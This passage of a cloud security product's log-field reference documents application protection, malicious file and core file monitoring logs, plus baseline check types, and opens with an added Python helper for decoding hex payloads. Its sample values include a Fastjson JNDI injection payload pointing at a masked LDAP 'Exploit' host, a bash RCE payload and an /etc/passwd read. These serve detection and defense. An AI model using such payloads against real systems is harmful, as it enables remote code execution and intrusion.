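The payload field in the table above is hex-encoded and may arrive cut off or masked, so it has to be decoded defensively before triage. The following Python sketch is an added example, not part of the Security Center documentation: it decodes the longest valid hex prefix and, assuming the payload is an HTTP request as in the documented sample, extracts the request line and headers. The function names and the sample record are constructed for illustration.

```python
import re
import string

HEX_CHARS = set(string.hexdigits)
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/(\d\.\d)$")


def decode_hex_payload(value):
    """Decode a hex `payload` value. Returns (data, complete).

    Only the longest valid hex prefix is decoded, so a value that was cut
    off or masked (a trailing "****") still yields its readable part.
    """
    value = value.strip()
    end = 0
    while end < len(value) and value[end] in HEX_CHARS:
        end += 1
    complete = end == len(value) and end % 2 == 0
    end -= end % 2  # a dangling nibble cannot form a byte
    return bytes.fromhex(value[:end]), complete


def summarize(record):
    """Build a triage summary from one network defense log record."""
    data, complete = decode_hex_payload(record.get("payload", ""))
    head, _, body = data.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    match = REQUEST_LINE.match(lines[0])  # None when the payload is not HTTP
    headers = {}
    for line in lines[1:]:
        name, sep, val = line.partition(b":")
        if sep:
            key = name.decode("latin-1").strip().lower()
            headers[key] = val.decode("latin-1").strip()
    return {
        "flow": "{src_ip}:{src_port} -> {dest_ip}:{dest_port}".format(**record),
        "process": "{} (pid {})".format(record.get("proc_path"), record.get("pid")),
        "method": match.group(1).decode() if match else None,
        "path": match.group(2).decode("latin-1") if match else None,
        "headers": headers,
        "body_bytes": len(body),
        "payload_complete": complete,
    }


# Constructed sample record; field names come from the table above.
_RAW = b"POST /upload HTTP/1.1\r\nHost: example.test\r\nUser-Agent: demo\r\n\r\nabc"
SAMPLE = {
    "src_ip": "198.51.100.7", "src_port": "29575",
    "dest_ip": "172.16.0.10", "dest_port": "80",
    "proc_path": "/usr/sbin/nginx", "pid": "7107",
    "func": "payload", "model": "block",
    "payload": _RAW.hex(),
}
# The same record with its payload cut short and masked with "****".
MASKED = dict(SAMPLE, payload=_RAW.hex()[:60] + "****")

if __name__ == "__main__":
    for rec in (SAMPLE, MASKED):
        print(summarize(rec))
```

A payload_complete value of False means the header and body values in the summary may be partial and should not be used for exact matching.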
Application protection logs
Field name | Description | Example |
app_dir | The directory in which the application is stored. | /usr/local/aegis/rasp/apps/1111 |
app_id | The ID of the application. | 6492a391fc9b4e2aad94**** |
app_name | The name of the application. | test |
confidence | The confidence level of the detection algorithm. Valid values:
| low |
content | The information about the request body. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
content_length | The length of the request body. | 112 |
data | The hook. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | The information about the request header. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | The name of the host or network device. | testhostname |
ip | The private IP address of the host. | 172.16.XX.XX |
is_cliped | Indicates whether the log is truncated due to an excessive length. Valid values:
| false |
jdk | The JDK version. | 1.8.0_292 |
message | The description of the alert. | Unsafe class serial. |
method | The method of the request. | Post |
os | The type of the operating system. | Linux |
os_arch | The architecture of the operating system. | amd64 |
os_version | The kernel version of the operating system. | 3.10.0-1160.59.1.el7.x86_64 |
param | The request parameter. In most cases, the parameter is in one of the following formats:
| {"url":["http://127.0.0.1.xip.io"]} |
payload | The attack payload. | bash -c kill -0 -- -'31098' |
payload_length | The length of the attack payload. | 27 |
rasp_id | The ID of the Runtime Application Self Protection (RASP) agent. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | The version of the RASP agent. | 0.4.3 |
remote | The IP address from which the request is initiated. | 172.0.XX.XX |
result | The handling result of the alert. Valid values:
| block |
rule_result | The alert handling action that is specified in the application protection rule. Valid values:
| block |
severity | The risk level. Valid values:
| high |
stacktrace | The stack information. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | The time when the alert was generated. | 2023-10-09 15:19:15 |
timestamp | The timestamp when the alert was generated. Unit: milliseconds. | 1696835955070 |
type | The type of the vulnerability. Valid values:
| rce |
url | The request URL. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | The UUID of the vulnerability. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | The UUID of the host. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | The public IP address of the host. | 1.2.XX.XX |
intranet_ip | The private IP address of the host. | 172.16.XX.XX |
sas_group_name | The group to which the server belongs in Security Center. | Group 1 |
instance_id | The instance ID of the host. | i-wz995eivg28f1m** |
Malicious file detection logs
Field name | Description | Example |
bucket_name | The name of the bucket. | ***-test |
event_id | The ID of the alert. | 802210 |
event_name | The name of the alert. | Mining program |
md5 | The MD5 value of the file. | 6bc2bc******53d409b1 |
sha256 | The SHA-256 hash value of the file. | f038f9525******7772981e87f85 |
result | The detection result.
| 0 |
file_path | The path to the file. | test.zip/bin_test |
etag | The ID of the OSS object. | 6BC2B******853D409B1 |
risk_level | The risk level.
| remind |
source | The check method.
| OSS |
parent_md5 | The MD5 hash value of the parent file or the compressed package file. | 3d0f8045bb9****** |
parent_sha256 | The SHA-256 hash value of the parent file or the compressed package file. | 69b643d6******a3fb859fa |
parent_file_path | The name of the parent file or the compressed package file. | test.zip |
start_time | The timestamp when the detection starts. Unit: seconds. | 1718678414 |
Core file monitoring event log
Field name | Description | Example |
start_time | The timestamp when the event last happened. Unit: seconds. | 1718678414 |
uuid | The UUID of the server. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | The path to the file. | /etc/passwd |
proc_path | The path to the process. | /usr/bin/bash |
rule_id | The ID of the hit rule. | 123 |
rule_name | The name of the rule. | file_test_rule |
cmdline | The command line. | bash /opt/a |
operation | The operation performed on the file. | READ |
risk_level | The risk level. | 2 |
pid | The process ID. | 45324 |
proc_permission | The permissions to run the process. | rwxrwxrwx |
instance_id | The instance ID. | i-wz995eivg2**** |
internet_ip | The public IP address. | 192.0.2.1 |
intranet_ip | The private IP address. | 172.16.0.1 |
instance_name | The instance name. | aegis-test |
platform | The operating system type. | Linux |
Appendix
Baseline types and subtypes
Type | Subtype | Description |
hc_exploit | hc_exploit_redis | High risk exploit-Redis unauthorized access high exploit vulnerability risk |
| hc_exploit_activemq | High risk exploit-ActiveMQ unauthorized access high exploit vulnerability risk |
| hc_exploit_couchdb | High risk exploit - CouchDB unauthorized access high exploit risk |
| hc_exploit_docker | High risk exploit - Docker unauthorized access high vulnerability risk |
| hc_exploit_es | High risk exploit - Elasticsearch unauthorized access high exploit vulnerability risk |
| hc_exploit_hadoop | High risk exploit - Hadoop unauthorized access high exploit vulnerability risk |
| hc_exploit_jboss | High risk exploit - Jboss unauthorized access high exploit vulnerability risk |
| hc_exploit_jenkins | High risk exploit - Jenkins unauthorized access high exploit vulnerability risk |
| hc_exploit_k8s_api | High risk exploit - Kubernetes Apiserver unauthorized access high exploit vulnerability risk |
| hc_exploit_ldap | High risk exploit - LDAP unauthorized access high exploit vulnerability risk (Windows) |
| hc_exploit_ldap_linux | High risk exploit-OpenLDAP unauthorized access vulnerability baseline (Linux) |
| hc_exploit_memcache | High risk exploit - Memcached unauthorized access high exploit vulnerability risk |
| hc_exploit_mongo | High risk exploit - Mongodb unauthorized access high exploit vulnerability risk |
| hc_exploit_pgsql | High risk exploit-Postgresql unauthorized access to high-risk risk baseline |
| hc_exploit_rabbitmq | High risk exploit-RabbitMQ unauthorized access high exploit vulnerability risk |
| hc_exploit_rsync | High risk exploit - rsync unauthorized access high exploit vulnerability risk |
| hc_exploit_tomcat | High risk exploit - Apache Tomcat AJP File Read/Inclusion Vulnerability |
| hc_exploit_zookeeper | High risk exploit - ZooKeeper unauthorized access high exploit vulnerability risk |
hc_container | hc_docker | Alibaba Cloud Standard - Docker Security Baseline Check |
| hc_middleware_ack_master | Kubernetes(ACK) Master Internationally Agreed Best Practices for Security |
| hc_middleware_ack_node | Kubernetes(ACK) Node Internationally Agreed Best Practices for Security |
| hc_middleware_k8s | Alibaba Cloud Standard-Kubernetes-Master security baseline check |
| hc_middleware_k8s_node | Alibaba Cloud Standard-Kubernetes-Node security baseline check |
cis | hc_suse 15_djbh | SUSE Linux 15 Baseline for China classified protection of cybersecurity-Level III |
| hc_aliyun_linux3_djbh_l3 | Alibaba Cloud Linux 3 Baseline for China classified protection of cybersecurity-Level III |
| hc_aliyun_linux_djbh_l3 | Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level III |
| hc_bind_djbh | China's Level 3 Protection of Cybersecurity - Bind Compliance Baseline Check |
| hc_centos 6_djbh_l3 | CentOS Linux 6 Baseline for China classified protection of cybersecurity-Level III |
| hc_centos 7_djbh_l3 | CentOS Linux 7 Baseline for China classified protection of cybersecurity-Level III |
| hc_centos 8_djbh_l3 | CentOS Linux 8 Baseline for China classified protection of cybersecurity - Level III |
| hc_debian_djbh_l3 | Debian Linux 8/9/10 Baseline for China classified protection of cybersecurity-Level III |
| hc_iis_djbh | IIS Baseline for China classified protection of cybersecurity-Level III |
| hc_informix_djbh | China's Level 3 Protection of Cybersecurity - Informix Compliance Baseline Check |
| hc_jboss_djbh | China's Level 3 Protection of Cybersecurity - Jboss6/7 Compliance Baseline Check |
| hc_mongo_djbh | MongoDB Baseline for China classified protection of cybersecurity-Level III |
| hc_mssql_djbh | China's Level 3 Protection of Cybersecurity -SQL Server Compliance Baseline Check |
| hc_mysql_djbh | Equal Guarantee Level 3-MySql Compliance Baseline Check |
| hc_nginx_djbh | Equal Guarantee Level 3-Nginx Compliance Baseline Check |
| hc_oracle_djbh | China's Level 3 Protection of Cybersecurity - Oracle Compliance Baseline Check |
| hc_pgsql_djbh | Level 3-PostgreSql compliance baseline check |
| hc_redhat 6_djbh_l3 | China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 6 Compliance Baseline Check |
| hc_redhat_djbh_l3 | China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 7 Compliance Baseline Check |
| hc_redis_djbh | Redis Baseline for China classified protection of cybersecurity-Level III |
| hc_suse 10_djbh_l3 | SUSE Linux 10 Baseline for China classified protection of cybersecurity-Level III |
| hc_suse 12_djbh_l3 | SUSE Linux 12 Baseline for China classified protection of cybersecurity-Level III |
| hc_suse_djbh_l3 | SUSE Linux 11 Baseline for China classified protection of cybersecurity-Level III |
| hc_ubuntu 14_djbh_l3 | Ubuntu 14 Baseline for China classified protection of cybersecurity-Level III |
| hc_ubuntu_djbh_l3 | Waiting for Level 3-Ubuntu 16/18/20 compliance regulations inspection |
| hc_was_djbh | China's Level 3 Protection of Cybersecurity - Websphere Application Server Compliance Baseline Check |
| hc_weblogic_djbh | Weblogic Baseline for China classified protection of cybersecurity-Level III |
| hc_win 2008_djbh_l3 | China's Level 3 Protection of Cybersecurity - Windows Server 2008 R2 Compliance Baseline Check |
| hc_win 2012_djbh_l3 | Windows 2012 R2 Baseline for China classified protection of cybersecurity-Level III |
| hc_win 2016_djbh_l3 | Windows 2016/2019 Baseline for China classified protection of cybersecurity-Level III |
| hc_aliyun_linux_djbh_l2 | Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level II |
| hc_centos 6_djbh_l2 | CentOS Linux 6 Baseline for China classified protection of cybersecurity-Level II |
| hc_centos 7_djbh_l2 | CentOS Linux 7 Baseline for China classified protection of cybersecurity-Level II |
| hc_debian_djbh_l2 | Debian Linux 8 Baseline for China classified protection of cybersecurity-Level II |
| hc_redhat 7_djbh_l2 | Redhat Linux 7 Baseline for China classified protection of cybersecurity-Level II |
| hc_ubuntu_djbh_l2 | Linux Ubuntu 16/18 Baseline for China classified protection of cybersecurity-Level II |
| hc_win 2008_djbh_l2 | Windows 2008 R2 Baseline for China classified protection of cybersecurity-Level II |
| hc_win 2012_djbh_l2 | Windows 2012 R2 Baseline for China classified protection of cybersecurity-Level II |
| hc_win 2016_djbh_l2 | Windows 2016/2019 Baseline for China classified protection of cybersecurity-Level II |
| hc_aliyun_linux_cis | Alibaba Cloud Linux 2 Internationally Agreed Best Practices for Security |
| hc_centos 6_cis_rules | CentOS Linux 6 LTS Internationally Agreed Best Practices for Security |
| hc_centos 7_cis_rules | CentOS Linux 7 LTS Internationally Agreed Best Practices for Security |
| hc_centos 8_cis_rules | CentOS Linux 8 LTS Internationally Agreed Best Practices for Security |
| hc_debian 8_cis_rules | Debian Linux 8 Internationally Agreed Best Practices for Security |
| hc_ubuntu 14_cis_rules | Ubuntu 14 LTS Internationally Agreed Best Practices for Security |
| hc_ubuntu 16_cis_rules | Ubuntu 16/18/20 LTS Internationally Agreed Best Practices for Security |
| hc_win 2008_cis_rules | Windows Server 2008 R2 Internationally Agreed Best Practices for Security |
| hc_win 2012_cis_rules | Windows Server 2012 R2 Internationally Agreed Best Practices for Security |
| hc_win 2016_cis_rules | Windows Server 2016/2019 R2 Internationally Agreed Best Practices for Security |
| hc_kylin_djbh_l3 | China's Level 3 Protection of Cybersecurity - Kylin Compliance Baseline Check |
| hc_uos_djbh_l3 | China's Level 3 Protection of Cybersecurity - uos Compliance Baseline Check |
hc_best_security | hc_aliyun_linux | Alibaba Cloud Linux/Aliyun Linux 2 Benchmark |
| hc_centos 6 | Alibaba Cloud Standard - CentOS Linux 6 Security Baseline Check |
| hc_centos 7 | Alibaba Cloud Standard - CentOS Linux 7/8 Security Baseline Check |
| hc_debian | Alibaba Cloud Standard - Debian Linux 8/9/10 Security Baseline |
| hc_redhat 6 | Alibaba Cloud Standard - Red Hat Enterprise Linux 6 Security Baseline Check |
| hc_redhat 7 | Alibaba Cloud Standard - Red Hat Enterprise Linux 7/8 Security Baseline Check |
| hc_ubuntu | Alibaba Cloud Standard - Ubuntu Security Baseline |
| hc_windows_2008 | Alibaba Cloud Standard - Windows Server 2008 R2 Security Baseline Check |
| hc_windows_2012 | Alibaba Cloud Standard - Windows 2012 R2 Security Baseline |
| hc_windows_2016 | Alibaba Cloud Standard - Windows 2016/2019 Security Baseline |
| hc_db_mssql | Alibaba Cloud Standard-SQL Server Security Baseline Check |
| hc_memcached_ali | Alibaba Cloud Standard - Memcached Security Baseline Check |
| hc_mongodb | Alibaba Cloud Standard - MongoDB version 3.x Security Baseline Check |
| hc_mysql_ali | Alibaba Cloud Standard - Mysql Security Baseline Check |
| hc_oracle | Alibaba Cloud Standard - Oracle 11g Security Baseline Check |
| hc_pgsql_ali | Alibaba Cloud Standard-PostgreSql Security Initialization Check |
| hc_redis_ali | Alibaba Cloud Standard - Redis Security Baseline Check |
| hc_apache | Alibaba Cloud Standard - Apache Security Baseline Check |
| hc_iis_8 | Alibaba Cloud Standard - IIS 8 Security Baseline Check |
| hc_nginx_linux | Alibaba Cloud Standard - Nginx Security Baseline Check |
| hc_suse 15 | Alibaba Cloud Standard - SUSE Linux 15 Security Baseline Check |
| tomcat 7 | Alibaba Cloud Standard-Apache Tomcat Security Baseline |
weak_password | hc_mongodb_pwd | Weak Password-MongoDB Weak Password baseline(support version 2. X) |
| hc_weakpwd_ftp_linux | Weak password - Ftp login weak password baseline |
| hc_weakpwd_linux_sys | Weak password - Linux system login weak password baseline |
| hc_weakpwd_mongodb 3 | Weak Password-MongoDB Weak Password baseline |
| hc_weakpwd_mssql | Weak password-SQL Server DB login weak password baseline |
| hc_weakpwd_mysql_linux | Weak password - Mysql DB login weak password baseline |
| hc_weakpwd_mysql_win | Weak password - Mysql DB login weak password baseline(Windows version) |
| hc_weakpwd_openldap | Weak password - Openldap login weak password baseline |
| hc_weakpwd_oracle | Weak Password-Oracle login weak password detection |
| hc_weakpwd_pgsql | Weak password - PostgreSQL DB login weak password baseline |
| hc_weakpwd_pptp | Weak password - pptpd login weak password baseline |
| hc_weakpwd_redis_linux | Weak password - Redis DB login weak password baseline |
| hc_weakpwd_rsync | Weak password - rsync login weak password baseline |
| hc_weakpwd_svn | Weak password - svn login weak password baseline |
| hc_weakpwd_tomcat_linux | Weak password - Apache Tomcat Console weak password baseline |
| hc_weakpwd_vnc | Weak password-VncServer weak password check |
| hc_weakpwd_weblogic | Weak password-Weblogic 12c login weak password detection |
| hc_weakpwd_win_sys | Weak password - Windows system login weak password baseline |
References
[Notice] Log dictionaries are upgraded